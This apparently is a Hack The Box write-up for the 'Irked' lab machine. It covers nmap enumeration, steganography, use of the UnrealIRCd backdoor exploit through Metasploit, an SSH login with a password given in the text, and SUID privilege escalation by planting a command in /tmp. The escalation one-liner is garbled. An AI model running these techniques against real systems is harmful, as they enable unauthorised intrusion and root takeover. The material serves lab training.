Apr 27, 2019
HTB Irked — Walkthrough
ENUMERATION
So let’s start enumeration with nmap scan
root@ArmourInfosec:~/ nmap -sV -p- 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.15s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
80/tcp open http Apache httpd 2.4.10 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
52816/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
we found the port 80 open so lets have a visit there
we got nothing except an image and a line that “IRC is almost working”
it’s a hint that there is something in irc but the image also look suspicious so i downloaded it and tried various methods and noticed that when i used steghide and entered blank passphrase it shows something strange
root@ArmourInfosec:~/ steghide extract -sf irked.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!OK now let’s look at another part that is IRC, I will use hexchat to join irc and see if it is authenticated or not, type hexchat in your terminal then click on add fill ip/port and click connect and yes it is not authenticated
A strange thing i noticed here is that the irc version is outdated Unrealircd3.2.8.1 so i searched it on google and found a metasploit exploit for it, I fired up my metasploit selected the exploit exploit/unix/irc/unreal_ircd_3281_backdoor fill all information needed and run the exploit
and we got the shell
so we go to /home/djmardov directory and inside Documents there are two files user.txt and .backup
we can’t open user.txt because we don’t have privileges so we open .backup
cat .backup
UPupDOWNdownLRlrBAbaSSssOK so using that we can extract the pass.txt file from irked.jpg
let’s try to login user with this password
djmardov:Kab6h+m+bbp2J:HG
ssh djmardov@10.10.10.117
now I simply read the user.txt file and started enumeration for privilege escalation
OK so i looked for binaries with the SUID or GUID bits set
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
and found that a binary /usr/bin/viewuser, when we run the binary it runs a command sh -c /tmp/listusers
so i manipulated the input and wrote su root in the listusers file at /tmp and then just run
echo “su root”> /tmp/listusers && chmod 777 listusers/usr/bin/viewuser
and you will get root
What really happened???
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
Thank you for reading!
